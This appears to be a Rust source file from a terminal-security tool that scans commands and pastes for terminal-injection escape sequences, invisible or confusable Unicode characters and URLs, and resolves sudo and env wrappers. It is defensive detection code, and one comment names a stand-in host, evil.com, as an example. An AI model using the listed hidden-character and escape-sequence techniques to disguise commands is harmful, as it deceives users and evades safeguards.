tirith_core/
extract.rs

1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::parse::{self, UrlLike};
5use crate::tokenize::{self, Segment, ShellType};
6
7/// Context for Tier 1 scanning.
8#[derive(Debug, Clone, Copy, PartialEq, Eq)]
9pub enum ScanContext {
10    /// Exec-time: command about to be executed (check subcommand).
11    Exec,
12    /// Paste-time: content being pasted (paste subcommand).
13    Paste,
14    /// File scan: content read from a file (scan subcommand).
15    /// Skips tier-1 fast-exit, runs byte scan + configfile rules only.
16    FileScan,
17}
18
19// Include generated Tier 1 patterns from build.rs declarative pattern table.
20#[allow(dead_code)]
21mod tier1_generated {
22    include!(concat!(env!("OUT_DIR"), "/tier1_gen.rs"));
23}
24
25/// Expose the build-time extractor IDs for test-time cross-referencing.
26pub fn extractor_ids() -> &'static [&'static str] {
27    tier1_generated::EXTRACTOR_IDS
28}
29
30/// Tier 1 exec-time regex — generated from declarative pattern table in build.rs.
31static TIER1_EXEC_REGEX: Lazy<Regex> = Lazy::new(|| {
32    Regex::new(tier1_generated::TIER1_EXEC_PATTERN).expect("tier1 exec regex must compile")
33});
34
35/// Tier 1 paste-time regex — exec patterns PLUS paste-only patterns (e.g. non-ASCII).
36static TIER1_PASTE_REGEX: Lazy<Regex> = Lazy::new(|| {
37    Regex::new(tier1_generated::TIER1_PASTE_PATTERN).expect("tier1 paste regex must compile")
38});
39
40/// Standard URL extraction regex for Tier 3.
41static URL_REGEX: Lazy<Regex> = Lazy::new(|| {
42    Regex::new(
43        r#"(?:(?:https?|ftp|ssh|git)://[^\s'"<>]+)|(?:[a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+:[^\s'"<>]+)"#,
44    )
45    .expect("url regex must compile")
46});
47
48/// Control character patterns for paste-time byte scanning.
49pub struct ByteScanResult {
50    pub has_ansi_escapes: bool,
51    pub has_control_chars: bool,
52    pub has_bidi_controls: bool,
53    pub has_zero_width: bool,
54    pub has_invalid_utf8: bool,
55    pub has_unicode_tags: bool,
56    pub has_variation_selectors: bool,
57    pub has_invisible_math_operators: bool,
58    pub has_invisible_whitespace: bool,
59    pub has_hangul_fillers: bool,
60    pub has_confusable_text: bool,
61    pub details: Vec<ByteFinding>,
62}
63
64pub struct ByteFinding {
65    pub offset: usize,
66    pub byte: u8,
67    /// Full Unicode codepoint for multi-byte characters (None for single-byte findings).
68    pub codepoint: Option<u32>,
69    pub description: String,
70}
71
72impl ByteScanResult {
73    /// Return a filtered view where findings whose offset falls inside `ignore`
74    /// are removed, and the `has_*` flags are re-derived from the survivors so
75    /// downstream tier-1/tier-3 gates stay consistent.
76    ///
77    /// Used by the inspection-subcommand carveout: bytes inside the inert arg
78    /// span of `tirith diff/score/why/...` commands shouldn't trigger Unicode-
79    /// style rules. `has_invalid_utf8` is a whole-input property and is left
80    /// unchanged.
81    pub fn with_ignored_range(mut self, ignore: &std::ops::Range<usize>) -> Self {
82        self.details.retain(|d| !ignore.contains(&d.offset));
83        // Re-derive flags from surviving details. Matched on description
84        // prefixes that correspond to each branch in `scan_bytes`.
85        self.has_ansi_escapes = false;
86        self.has_control_chars = false;
87        self.has_bidi_controls = false;
88        self.has_zero_width = false;
89        self.has_unicode_tags = false;
90        self.has_variation_selectors = false;
91        self.has_invisible_math_operators = false;
92        self.has_invisible_whitespace = false;
93        self.has_hangul_fillers = false;
94        self.has_confusable_text = false;
95        for d in &self.details {
96            let desc = d.description.as_str();
97            if desc.ends_with("escape sequence") || desc == "trailing escape byte" {
98                self.has_ansi_escapes = true;
99            } else if desc.starts_with("control character") {
100                self.has_control_chars = true;
101            } else if desc.starts_with("bidi control") {
102                self.has_bidi_controls = true;
103            } else if desc.starts_with("zero-width character") {
104                self.has_zero_width = true;
105            } else if desc.starts_with("unicode tag") {
106                self.has_unicode_tags = true;
107            } else if desc.starts_with("variation selector") {
108                self.has_variation_selectors = true;
109            } else if desc.starts_with("invisible math operator") {
110                self.has_invisible_math_operators = true;
111            } else if desc.starts_with("invisible whitespace") {
112                self.has_invisible_whitespace = true;
113            } else if desc.starts_with("hangul filler") {
114                self.has_hangul_fillers = true;
115            } else if desc.starts_with("confusable") || desc.starts_with("text confusable") {
116                self.has_confusable_text = true;
117            }
118        }
119        self
120    }
121}
122
123/// Tier 1: Fast scan for URL-like content. Returns true if full analysis needed.
124pub fn tier1_scan(input: &str, context: ScanContext) -> bool {
125    match context {
126        ScanContext::Exec => TIER1_EXEC_REGEX.is_match(input),
127        ScanContext::Paste => TIER1_PASTE_REGEX.is_match(input),
128        // FileScan always proceeds to tier-3 (no fast-exit)
129        ScanContext::FileScan => true,
130    }
131}
132
133/// Scan raw bytes for control characters (paste-time, Tier 1 step 1).
134pub fn scan_bytes(input: &[u8]) -> ByteScanResult {
135    let mut result = ByteScanResult {
136        has_ansi_escapes: false,
137        has_control_chars: false,
138        has_bidi_controls: false,
139        has_zero_width: false,
140        has_invalid_utf8: false,
141        has_unicode_tags: false,
142        has_variation_selectors: false,
143        has_invisible_math_operators: false,
144        has_invisible_whitespace: false,
145        has_hangul_fillers: false,
146        has_confusable_text: false,
147        details: Vec::new(),
148    };
149
150    // Check for invalid UTF-8
151    if std::str::from_utf8(input).is_err() {
152        result.has_invalid_utf8 = true;
153    }
154
155    let len = input.len();
156    let mut i = 0;
157    while i < len {
158        let b = input[i];
159
160        // Escape sequences: CSI (\e[), OSC (\e]), APC (\e_), DCS (\eP)
161        if b == 0x1b {
162            // CSI (\e[), OSC (\e]), APC (\e_), DCS (\eP) are the escape-sequence
163            // introducers used for terminal injection attacks.
164            if i + 1 < len {
165                let next = input[i + 1];
166                if next == b'[' || next == b']' || next == b'_' || next == b'P' {
167                    result.has_ansi_escapes = true;
168                    result.details.push(ByteFinding {
169                        offset: i,
170                        byte: b,
171                        codepoint: None,
172                        description: match next {
173                            b'[' => "CSI escape sequence",
174                            b']' => "OSC escape sequence",
175                            b'_' => "APC escape sequence",
176                            b'P' => "DCS escape sequence",
177                            _ => "escape sequence",
178                        }
179                        .to_string(),
180                    });
181                    i += 2;
182                    continue;
183                }
184            } else {
185                result.has_ansi_escapes = true;
186                result.details.push(ByteFinding {
187                    offset: i,
188                    byte: b,
189                    codepoint: None,
190                    description: "trailing escape byte".to_string(),
191                });
192            }
193        }
194
195        // CR: only flag mid-stream CRs (display-overwriting attacks). Trailing
196        // CR and CRLF (Windows line endings) are benign clipboard artifacts.
197        if b == b'\r' {
198            let is_attack_cr = i + 1 < len && input[i + 1] != b'\n';
199            if is_attack_cr {
200                result.has_control_chars = true;
201                result.details.push(ByteFinding {
202                    offset: i,
203                    byte: b,
204                    codepoint: None,
205                    description: format!("control character 0x{b:02x}"),
206                });
207            }
208        } else if b < 0x20 && b != b'\n' && b != b'\t' && b != 0x1b {
209            result.has_control_chars = true;
210            result.details.push(ByteFinding {
211                offset: i,
212                byte: b,
213                codepoint: None,
214                description: format!("control character 0x{b:02x}"),
215            });
216        }
217
218        if b == 0x7F {
219            result.has_control_chars = true;
220            result.details.push(ByteFinding {
221                offset: i,
222                byte: b,
223                codepoint: None,
224                description: "control character 0x7f (DEL)".to_string(),
225            });
226        }
227
228        // UTF-8 continuation byte? Decode the char and check it against every
229        // invisible/confusable class in one pass.
230        if b >= 0xc0 {
231            let remaining = &input[i..];
232            if let Some(ch) = std::str::from_utf8(remaining)
233                .ok()
234                .or_else(|| std::str::from_utf8(&remaining[..remaining.len().min(4)]).ok())
235                .and_then(|s| s.chars().next())
236            {
237                if is_bidi_control(ch) {
238                    result.has_bidi_controls = true;
239                    result.details.push(ByteFinding {
240                        offset: i,
241                        byte: b,
242                        codepoint: Some(ch as u32),
243                        description: format!("bidi control U+{:04X}", ch as u32),
244                    });
245                }
246                // ZWSP, ZWNJ, ZWJ, BOM, CGJ, Soft Hyphen, Word Joiner.
247                // BOM (U+FEFF) at offset 0 is a file-encoding artifact, not an attack.
248                if is_zero_width(ch) && !(ch == '\u{FEFF}' && i == 0) {
249                    result.has_zero_width = true;
250                    result.details.push(ByteFinding {
251                        offset: i,
252                        byte: b,
253                        codepoint: Some(ch as u32),
254                        description: format!("zero-width character U+{:04X}", ch as u32),
255                    });
256                }
257                // Unicode Tags U+E0000–U+E007F (hidden-ASCII encoding).
258                if is_unicode_tag(ch) {
259                    result.has_unicode_tags = true;
260                    result.details.push(ByteFinding {
261                        offset: i,
262                        byte: b,
263                        codepoint: Some(ch as u32),
264                        description: format!("unicode tag U+{:04X}", ch as u32),
265                    });
266                }
267                // U+FE00–U+FE0F and U+E0100–U+E01EF.
268                if is_variation_selector(ch) {
269                    result.has_variation_selectors = true;
270                    result.details.push(ByteFinding {
271                        offset: i,
272                        byte: b,
273                        codepoint: Some(ch as u32),
274                        description: format!("variation selector U+{:04X}", ch as u32),
275                    });
276                }
277                // U+2061–U+2064.
278                if is_invisible_math_operator(ch) {
279                    result.has_invisible_math_operators = true;
280                    result.details.push(ByteFinding {
281                        offset: i,
282                        byte: b,
283                        codepoint: Some(ch as u32),
284                        description: format!("invisible math operator U+{:04X}", ch as u32),
285                    });
286                }
287                // Invisible whitespace (stealth-encoded spaces).
288                if is_invisible_whitespace(ch) {
289                    result.has_invisible_whitespace = true;
290                    result.details.push(ByteFinding {
291                        offset: i,
292                        byte: b,
293                        codepoint: Some(ch as u32),
294                        description: format!("invisible whitespace U+{:04X}", ch as u32),
295                    });
296                }
297                if is_hangul_filler(ch) {
298                    result.has_hangul_fillers = true;
299                    result.details.push(ByteFinding {
300                        offset: i,
301                        byte: b,
302                        codepoint: Some(ch as u32),
303                        description: format!("hangul filler U+{:04X}", ch as u32),
304                    });
305                }
306                // Math alphanumerics + hostname confusables.
307                if let Some(target) = crate::text_confusables::is_text_confusable(ch) {
308                    result.has_confusable_text = true;
309                    result.details.push(ByteFinding {
310                        offset: i,
311                        byte: b,
312                        codepoint: Some(ch as u32),
313                        description: format!(
314                            "text confusable U+{:04X} (looks like '{target}')",
315                            ch as u32
316                        ),
317                    });
318                } else if let Some(target) = crate::confusables::is_confusable(ch) {
319                    result.has_confusable_text = true;
320                    result.details.push(ByteFinding {
321                        offset: i,
322                        byte: b,
323                        codepoint: Some(ch as u32),
324                        description: format!(
325                            "confusable U+{:04X} (looks like '{target}')",
326                            ch as u32
327                        ),
328                    });
329                }
330                i += ch.len_utf8();
331                continue;
332            }
333        }
334
335        i += 1;
336    }
337
338    result
339}
340
341/// Check if a character is a bidi control.
342fn is_bidi_control(ch: char) -> bool {
343    matches!(
344        ch,
345        '\u{200E}' // LRM
346        | '\u{200F}' // RLM
347        | '\u{202A}' // LRE
348        | '\u{202B}' // RLE
349        | '\u{202C}' // PDF
350        | '\u{202D}' // LRO
351        | '\u{202E}' // RLO
352        | '\u{2066}' // LRI
353        | '\u{2067}' // RLI
354        | '\u{2068}' // FSI
355        | '\u{2069}' // PDI
356    )
357}
358
359/// Check if a character is zero-width.
360fn is_zero_width(ch: char) -> bool {
361    matches!(
362        ch,
363        '\u{180E}' // Mongolian Vowel Separator
364        | '\u{200B}' // ZWSP
365        | '\u{200C}' // ZWNJ
366        | '\u{200D}' // ZWJ
367        | '\u{FEFF}' // BOM / ZWNBSP
368        | '\u{034F}' // Combining Grapheme Joiner
369        | '\u{00AD}' // Soft Hyphen
370        | '\u{2060}' // Word Joiner
371    )
372}
373
374/// Check if a character is a Unicode Tag (hidden ASCII encoding).
375fn is_unicode_tag(ch: char) -> bool {
376    ('\u{E0000}'..='\u{E007F}').contains(&ch)
377}
378
379/// Check if a character is a variation selector (VS1-16 or VS17-256).
380fn is_variation_selector(ch: char) -> bool {
381    ('\u{FE00}'..='\u{FE0F}').contains(&ch) || ('\u{E0100}'..='\u{E01EF}').contains(&ch)
382}
383
384/// Check if a character is a Hangul Filler (invisible Korean character).
385fn is_hangul_filler(ch: char) -> bool {
386    matches!(
387        ch,
388        '\u{3164}' // Hangul Filler
389        | '\u{115F}' // Hangul Choseong Filler
390        | '\u{1160}' // Hangul Jungseong Filler
391    )
392}
393
394/// Check if a character is an invisible math operator (Function Application,
395/// Invisible Times, Invisible Separator, Invisible Plus).
396fn is_invisible_math_operator(ch: char) -> bool {
397    ('\u{2061}'..='\u{2064}').contains(&ch)
398}
399
400/// Check if a character is a stealth-encoding whitespace variant.
401/// These are Unicode spaces used in steganographic encoding (e.g. st3gg confusable
402/// whitespace). Layout spaces (U+00A0 NBSP, U+202F Narrow NBSP, U+3000 Ideographic)
403/// are deliberately excluded — they appear legitimately in localized prose.
404fn is_invisible_whitespace(ch: char) -> bool {
405    matches!(
406        ch,
407        '\u{2000}' // En Quad
408        | '\u{2001}' // Em Quad
409        | '\u{2002}' // En Space
410        | '\u{2003}' // Em Space
411        | '\u{2004}' // Three-Per-Em Space
412        | '\u{2005}' // Four-Per-Em Space
413        | '\u{2006}' // Six-Per-Em Space
414        | '\u{2007}' // Figure Space
415        | '\u{2008}' // Punctuation Space
416        | '\u{2009}' // Thin Space
417        | '\u{200A}' // Hair Space
418        | '\u{205F}' // Medium Mathematical Space
419    )
420}
421
422/// Tier 3: Extract URL-like patterns from a command string.
423/// Uses shell-aware tokenization, then extracts URLs from each segment.
424pub fn extract_urls(input: &str, shell: ShellType) -> Vec<ExtractedUrl> {
425    let segments = tokenize::tokenize(input, shell);
426    let mut results = Vec::new();
427
428    for (seg_idx, segment) in segments.iter().enumerate() {
429        let sink_context = is_sink_context(segment, &segments);
430        let resolved = resolve_segment_command(segment);
431
432        // Suppress URL extraction ONLY for the arg span of a first-segment
433        // tirith inspection subcommand — not the whole segment. Leading env
434        // assignments and wrapper tokens (sudo/env/time) must still be
435        // analyzed; `FOO=https://evil.com tirith diff safe` must still flag
436        // FOO. Since `resolved` can come through a wrapper, we first locate
437        // where the literal "tirith" word lives in the segment.
438        let inspection_skip_args_from: Option<usize> = if seg_idx == 0 {
439            resolved.as_ref().and_then(|cmd| {
440                if cmd.name != "tirith" {
441                    return None;
442                }
443                // Locate the tirith word within the tokenized segment.
444                let start_from: usize =
445                    if segment.command.as_deref().map(command_base_name).as_deref()
446                        == Some("tirith")
447                    {
448                        0
449                    } else if let Some(at) = segment
450                        .args
451                        .iter()
452                        .position(|a| command_base_name(a) == "tirith")
453                    {
454                        at + 1
455                    } else {
456                        return None;
457                    };
458                // Skip flags (e.g. `--quiet`) after the tirith word to land
459                // on the subcommand token.
460                let mut i = start_from;
461                while i < segment.args.len() {
462                    let clean = strip_quotes(&segment.args[i]);
463                    if clean.starts_with('-') {
464                        i += 1;
465                        continue;
466                    }
467                    break;
468                }
469                let sub_arg = segment.args.get(i)?;
470                if is_tirith_inspection_subcommand(&command_base_name(sub_arg)) {
471                    Some(i)
472                } else {
473                    None
474                }
475            })
476        } else {
477            None
478        };
479
480        // Extract standard URLs from command + args plus leading env-assignment values.
481        // Keep the raw-text expansion targeted so output/auth false-positive suppression
482        // still applies to the command/arg path.
483        let mut url_sources: Vec<&str> = Vec::new();
484        if let Some(ref cmd) = segment.command {
485            url_sources.push(cmd.as_str());
486        }
487        for (arg_idx, arg) in segment.args.iter().enumerate() {
488            // For tirith inspection subcommands, the subcommand word and all
489            // later args form the inert arg span — don't extract URLs from them.
490            if let Some(skip_from) = inspection_skip_args_from {
491                if arg_idx >= skip_from {
492                    break;
493                }
494            }
495            url_sources.push(arg.as_str());
496        }
497        for (name, value) in tokenize::leading_env_assignments(&segment.raw) {
498            if ignores_env_assignment_url(&name) {
499                continue;
500            }
501            let clean = strip_quotes(&value);
502            if !clean.is_empty() {
503                push_urls_from_source(&clean, seg_idx, sink_context, &mut results);
504            }
505        }
506        for source in &url_sources {
507            push_urls_from_source(source, seg_idx, sink_context, &mut results);
508        }
509
510        // Check for schemeless URLs in sink contexts
511        // Skip for docker/podman/nerdctl commands since their args are handled as DockerRef
512        let is_docker_cmd = resolved
513            .as_ref()
514            .is_some_and(|cmd| matches!(cmd.name.as_str(), "docker" | "podman" | "nerdctl"));
515        if sink_context && !is_docker_cmd {
516            if let Some(cmd) = resolved.as_ref() {
517                // scp/rsync arguments are either (a) remote specs (handled by
518                // parse_scp_remote_spec below) or (b) local file paths — never
519                // schemeless domain candidates. Skip the schemeless heuristic
520                // for these commands; scheme-full URLs still get caught by
521                // URL_REGEX earlier. Without this skip, `scp test.asdf
522                // host:/home/user/` trips on both the local filename (`.asdf`
523                // TLD shape) and the remote spec (`host:path` shape).
524                let is_remote_copy = matches!(cmd.name.as_str(), "scp" | "rsync");
525                for (arg_idx, arg) in cmd.args.iter().enumerate() {
526                    // Skip args that are output-file flag values
527                    if is_output_flag_value(&cmd.name, cmd.args, arg_idx) {
528                        continue;
529                    }
530                    let clean = strip_quotes(arg);
531                    if is_remote_copy {
532                        // Validate the spec shape when present, so downstream
533                        // policy can consume it later, but don't emit schemeless
534                        // for either remote specs or local files.
535                        let _ = parse_scp_remote_spec(&clean, shell);
536                        continue;
537                    }
538                    if looks_like_schemeless_host(&clean) && !URL_REGEX.is_match(&clean) {
539                        results.push(ExtractedUrl {
540                            raw: clean.clone(),
541                            parsed: UrlLike::SchemelessHostPath {
542                                host: extract_host_from_schemeless(&clean),
543                                path: extract_path_from_schemeless(&clean),
544                            },
545                            segment_index: seg_idx,
546                            in_sink_context: true,
547                        });
548                    }
549                }
550            }
551        }
552
553        // Check for Docker refs in docker commands
554        if let Some(cmd) = resolved.as_ref() {
555            if matches!(cmd.name.as_str(), "docker" | "podman" | "nerdctl") {
556                if let Some(docker_subcmd) = cmd.args.first() {
557                    let subcmd_lower = docker_subcmd.to_lowercase();
558                    if subcmd_lower == "build" {
559                        // `docker build` takes the image ref from -t/--tag.
560                        // Every other arg is build context / flags.
561                        let mut i = 1;
562                        while i < cmd.args.len() {
563                            let arg = strip_quotes(&cmd.args[i]);
564                            if (arg == "-t" || arg == "--tag") && i + 1 < cmd.args.len() {
565                                let tag_val = strip_quotes(&cmd.args[i + 1]);
566                                if !tag_val.is_empty() {
567                                    let docker_url = parse::parse_docker_ref(&tag_val);
568                                    results.push(ExtractedUrl {
569                                        raw: tag_val,
570                                        parsed: docker_url,
571                                        segment_index: seg_idx,
572                                        in_sink_context: true,
573                                    });
574                                }
575                                i += 2;
576                            } else if arg.starts_with("-t") && arg.len() > 2 {
577                                let tag_val = strip_quotes(&arg[2..]);
578                                let docker_url = parse::parse_docker_ref(&tag_val);
579                                results.push(ExtractedUrl {
580                                    raw: tag_val,
581                                    parsed: docker_url,
582                                    segment_index: seg_idx,
583                                    in_sink_context: true,
584                                });
585                                i += 1;
586                            } else if let Some(val) = arg.strip_prefix("--tag=") {
587                                let tag_val = strip_quotes(val);
588                                let docker_url = parse::parse_docker_ref(&tag_val);
589                                results.push(ExtractedUrl {
590                                    raw: tag_val,
591                                    parsed: docker_url,
592                                    segment_index: seg_idx,
593                                    in_sink_context: true,
594                                });
595                                i += 1;
596                            } else {
597                                i += 1;
598                            }
599                        }
600                    } else if subcmd_lower == "image" {
601                        // `docker image pull/push/...` — the real subcommand is args[1].
602                        if let Some(image_subcmd) = cmd.args.get(1) {
603                            let image_subcmd_lower = image_subcmd.to_lowercase();
604                            if matches!(
605                                image_subcmd_lower.as_str(),
606                                "pull" | "push" | "inspect" | "rm" | "tag"
607                            ) {
608                                extract_first_docker_image(&cmd.args[2..], seg_idx, &mut results);
609                            }
610                        }
611                    } else if matches!(subcmd_lower.as_str(), "pull" | "run" | "create") {
612                        // First non-flag arg is the image; any later args are
613                        // arguments to the containerized command, not refs.
614                        extract_first_docker_image(&cmd.args[1..], seg_idx, &mut results);
615                    }
616                }
617            }
618        }
619    }
620
621    results
622}
623
624/// An extracted URL with context.
625#[derive(Debug, Clone)]
626pub struct ExtractedUrl {
627    pub raw: String,
628    pub parsed: UrlLike,
629    pub segment_index: usize,
630    pub in_sink_context: bool,
631}
632
633/// Common value-taking flags across docker subcommands.
634const DOCKER_VALUE_FLAGS: &[&str] = &[
635    "--platform",
636    "--format",
637    "--filter",
638    "-f",
639    "--label",
640    "-l",
641    "--name",
642    "--hostname",
643    "--user",
644    "-u",
645    "--workdir",
646    "-w",
647    "--network",
648    "--net",
649    "--env",
650    "-e",
651    "--env-file",
652    "--publish",
653    "-p",
654    "--expose",
655    "--volume",
656    "-v",
657    "--mount",
658    "--add-host",
659    "--device",
660    "--entrypoint",
661    "--log-driver",
662    "--log-opt",
663    "--restart",
664    "--runtime",
665    "--cpus",
666    "--cpu-shares",
667    "--cpu-quota",
668    "--memory",
669    "--memory-reservation",
670    "--memory-swap",
671    "--shm-size",
672    "--ulimit",
673    "--security-opt",
674    "--sysctl",
675    "--tmpfs",
676    "--gpus",
677    "--ipc",
678    "--pid",
679    "--userns",
680    "--cgroupns",
681];
682
683/// Short flags that may embed their value inline (e.g., -p8080:80).
684const DOCKER_VALUE_PREFIXES: &[&str] = &["-p", "-e", "-v", "-l", "-u", "-w"];
685
686/// Extract the first non-flag argument as a Docker image reference.
687fn extract_first_docker_image(args: &[String], seg_idx: usize, results: &mut Vec<ExtractedUrl>) {
688    let mut skip_next = false;
689    let mut end_of_options = false;
690    for arg in args {
691        if skip_next {
692            skip_next = false;
693            continue;
694        }
695        let clean = strip_quotes(arg);
696        if clean == "--" {
697            end_of_options = true;
698            continue;
699        }
700        if !end_of_options && clean.starts_with("--") && clean.contains('=') {
701            continue;
702        }
703        if !end_of_options && clean.starts_with('-') {
704            if DOCKER_VALUE_FLAGS.iter().any(|f| clean == *f) {
705                skip_next = true;
706            }
707            if DOCKER_VALUE_PREFIXES
708                .iter()
709                .any(|p| clean.starts_with(p) && clean.len() > p.len())
710            {
711                continue;
712            }
713            continue;
714        }
715        if !clean.contains("://") && clean != "." && clean != ".." && clean != "-" {
716            let docker_url = parse::parse_docker_ref(&clean);
717            results.push(ExtractedUrl {
718                raw: clean,
719                parsed: docker_url,
720                segment_index: seg_idx,
721                in_sink_context: true,
722            });
723        }
724        // Only the FIRST non-flag arg is the image; anything else is the
725        // containerized command's argv.
726        break;
727    }
728}
729
730#[derive(Debug, Clone)]
731struct ResolvedCommand<'a> {
732    name: String,
733    args: &'a [String],
734}
735
736fn push_urls_from_source(
737    source: &str,
738    segment_index: usize,
739    in_sink_context: bool,
740    results: &mut Vec<ExtractedUrl>,
741) {
742    for mat in URL_REGEX.find_iter(source) {
743        let raw = mat.as_str().to_string();
744        let url = parse::parse_url(&raw);
745        results.push(ExtractedUrl {
746            raw,
747            parsed: url,
748            segment_index,
749            in_sink_context,
750        });
751    }
752}
753
754fn ignores_env_assignment_url(name: &str) -> bool {
755    let upper = name.to_ascii_uppercase();
756    upper == "NO_PROXY" || upper.ends_with("_PROXY")
757}
758
759fn env_long_flag_takes_value(flag: &str) -> bool {
760    let name = flag.split_once('=').map(|(name, _)| name).unwrap_or(flag);
761    matches!(name, "--unset" | "--chdir" | "--split-string")
762}
763
764fn command_base_name(raw: &str) -> String {
765    let clean = strip_quotes(raw);
766    clean
767        .rsplit(['/', '\\'])
768        .next()
769        .unwrap_or(clean.as_str())
770        .to_lowercase()
771}
772
773fn resolve_segment_command(segment: &Segment) -> Option<ResolvedCommand<'_>> {
774    let command = segment.command.as_ref()?;
775    resolve_named_command(command, &segment.args)
776}
777
778/// Resolve a segment's command through wrappers (`env`, `command`, `time`,
779/// `sudo`/`doas`, `tirith`) and return the resolved name and the wrapped
780/// command's args. Callers outside the extractor (e.g. `check_network_policy`)
781/// use this so wrapped invocations like `sudo curl …` or `env curl …` get the
782/// same policy treatment as the bare command.
783///
784/// Returns `None` if the segment has no command or the wrapper chain can't be
785/// resolved (e.g. `sudo` with no command word).
786pub fn resolve_wrapped_command(segment: &Segment) -> Option<(String, Vec<String>)> {
787    let resolved = resolve_segment_command(segment)?;
788    Some((resolved.name, resolved.args.to_vec()))
789}
790
791fn resolve_named_command<'a>(command: &str, args: &'a [String]) -> Option<ResolvedCommand<'a>> {
792    let name = command_base_name(command);
793    match name.as_str() {
794        "env" => resolve_env_command(args),
795        "command" => resolve_command_wrapper(args),
796        "time" => resolve_time_wrapper(args),
797        "sudo" | "doas" => resolve_sudo_wrapper(args),
798        "tirith" => resolve_tirith_command(args),
799        _ => Some(ResolvedCommand { name, args }),
800    }
801}
802
803/// Resolve through a `sudo`/`doas` wrapper to the real command.
804///
805/// Handles common sudo flag shapes:
806/// - `sudo cmd args…`                                  → cmd with args
807/// - `sudo -u user cmd args…` / `sudo --user=user cmd` → cmd after the flag(s)
808/// - `sudo -E -H cmd args…`                            → cmd after flags
809/// - `sudo VAR=val cmd args…`                          → env assignment, cmd after
810///
811/// Unknown value-taking flags aren't special-cased; we honor only the common
812/// ones. Deliberately conservative: if we can't unambiguously resolve the
813/// command, return None and let the caller fall back to the literal first token.
814fn resolve_sudo_wrapper(args: &[String]) -> Option<ResolvedCommand<'_>> {
815    // Short sudo(8) flags that take a value.
816    //
817    // Boolean-only flags (-S stdin, -A askpass, -B bell, -E -H -K -L -l -n -P
818    // -s -V -v, and -h which is short for --help, not --host) must NOT be on
819    // this list — treating them as value-taking would eat the next token and
820    // break wrapped-command resolution.
821    const SUDO_VALUE_FLAGS: &[&str] = &["-u", "-g", "-p", "-C", "-D", "-U", "-r", "-t"];
822    // Long flags that take a value unless combined with `=`.
823    const SUDO_LONG_VALUE_FLAGS: &[&str] = &[
824        "--user",
825        "--group",
826        "--prompt",
827        "--close-from",
828        "--chdir",
829        "--other-user",
830        "--role",
831        "--type",
832        "--host",
833    ];
834
835    let mut i = 0;
836    let mut after_dashdash = false;
837    while i < args.len() {
838        let clean = strip_quotes(&args[i]);
839        if !after_dashdash && clean == "--" {
840            after_dashdash = true;
841            i += 1;
842            continue;
843        }
844        // Env-style assignments before the command (sudo VAR=val cmd)
845        if !after_dashdash && tokenize::is_env_assignment(&clean) {
846            i += 1;
847            continue;
848        }
849        if !after_dashdash && clean.starts_with("--") {
850            let name_part = clean.split_once('=').map(|(n, _)| n).unwrap_or(&clean);
851            if !clean.contains('=') && SUDO_LONG_VALUE_FLAGS.contains(&name_part) {
852                i += 2;
853            } else {
854                i += 1;
855            }
856            continue;
857        }
858        if !after_dashdash && clean.starts_with('-') {
859            if SUDO_VALUE_FLAGS.contains(&clean.as_str()) {
860                i += 2;
861                continue;
862            }
863            i += 1;
864            continue;
865        }
866        // First non-flag, non-assignment argument is the wrapped command.
867        return resolve_named_command(&clean, &args[i + 1..]);
868    }
869    None
870}
871
872fn resolve_env_command(args: &[String]) -> Option<ResolvedCommand<'_>> {
873    let mut i = 0;
874    while i < args.len() {
875        let clean = strip_quotes(&args[i]);
876        if clean == "--" {
877            i += 1;
878            break;
879        }
880        if tokenize::is_env_assignment(&clean) {
881            i += 1;
882            continue;
883        }
884        if clean.starts_with('-') {
885            if clean.starts_with("--") {
886                if env_long_flag_takes_value(&clean) && !clean.contains('=') {
887                    i += 2;
888                } else {
889                    i += 1;
890                }
891                continue;
892            }
893            if clean == "-u" || clean == "-C" || clean == "-S" {
894                i += 2;
895                continue;
896            }
897            i += 1;
898            continue;
899        }
900        return resolve_named_command(&clean, &args[i + 1..]);
901    }
902
903    while i < args.len() {
904        let clean = strip_quotes(&args[i]);
905        if tokenize::is_env_assignment(&clean) {
906            i += 1;
907            continue;
908        }
909        return resolve_named_command(&clean, &args[i + 1..]);
910    }
911
912    None
913}
914
915fn resolve_command_wrapper(args: &[String]) -> Option<ResolvedCommand<'_>> {
916    let mut i = 0;
917    while i < args.len() {
918        let clean = strip_quotes(&args[i]);
919        if clean == "--" {
920            i += 1;
921            break;
922        }
923        if clean.starts_with('-') {
924            i += 1;
925            continue;
926        }
927        break;
928    }
929    args.get(i)
930        .and_then(|arg| resolve_named_command(arg, &args[i + 1..]))
931}
932
933fn resolve_time_wrapper(args: &[String]) -> Option<ResolvedCommand<'_>> {
934    let mut i = 0;
935    while i < args.len() {
936        let clean = strip_quotes(&args[i]);
937        if clean == "--" {
938            i += 1;
939            break;
940        }
941        if clean.starts_with('-') {
942            if clean == "-f" || clean == "--format" || clean == "-o" || clean == "--output" {
943                i += 2;
944            } else {
945                i += 1;
946            }
947            continue;
948        }
949        break;
950    }
951    args.get(i)
952        .and_then(|arg| resolve_named_command(arg, &args[i + 1..]))
953}
954
955fn resolve_tirith_command(args: &[String]) -> Option<ResolvedCommand<'_>> {
956    let subcommand = args.first().map(|arg| command_base_name(arg))?;
957    match subcommand.as_str() {
958        "run" => Some(ResolvedCommand {
959            name: "tirith-run".to_string(),
960            args: &args[1..],
961        }),
962        _ => Some(ResolvedCommand {
963            name: "tirith".to_string(),
964            args,
965        }),
966    }
967}
968
969/// Whether a tirith subcommand is an "inspection" command — i.e. one whose
970/// purpose is to describe/score a suspicious input that the user deliberately
971/// typed (not execute it). For these, we suppress URL extraction and the
972/// exec-context byte-scan carveout.
973///
974/// **Deliberately narrow** — only the "here's a suspicious input, tell me
975/// about it" commands. Adding anything else (e.g. `doctor`, `init`, `setup`,
976/// `version`) requires a motivating false-positive fixture.
977fn is_tirith_inspection_subcommand(sub: &str) -> bool {
978    matches!(sub, "diff" | "score" | "why" | "receipt" | "explain")
979}
980
981/// Resolve the first segment of `input` as a potential tirith inspection
982/// subcommand. When matched, return the byte range (within `input`) of the
983/// arg span that follows the subcommand word — the inert region that should
984/// be skipped by URL extraction and Unicode-style byte scans.
985///
986/// Returns `None` for:
987/// - non-tirith commands
988/// - `tirith run` (a sink — URL analysis still applies)
989/// - tirith subcommands not on the narrow inspection list
990/// - inputs where the first segment doesn't tokenize cleanly
991///
992/// Resolves through `env`, `command`, `time`, and `sudo`-style wrappers by
993/// delegating to `resolve_named_command`. Leading flags like
994/// `tirith --quiet diff URL` are handled — the subcommand word is the first
995/// non-flag argument.
996///
997/// Only the FIRST segment's arg span is returned; later pipeline segments
998/// (`tirith diff foo | grep bar`) are still analyzed normally.
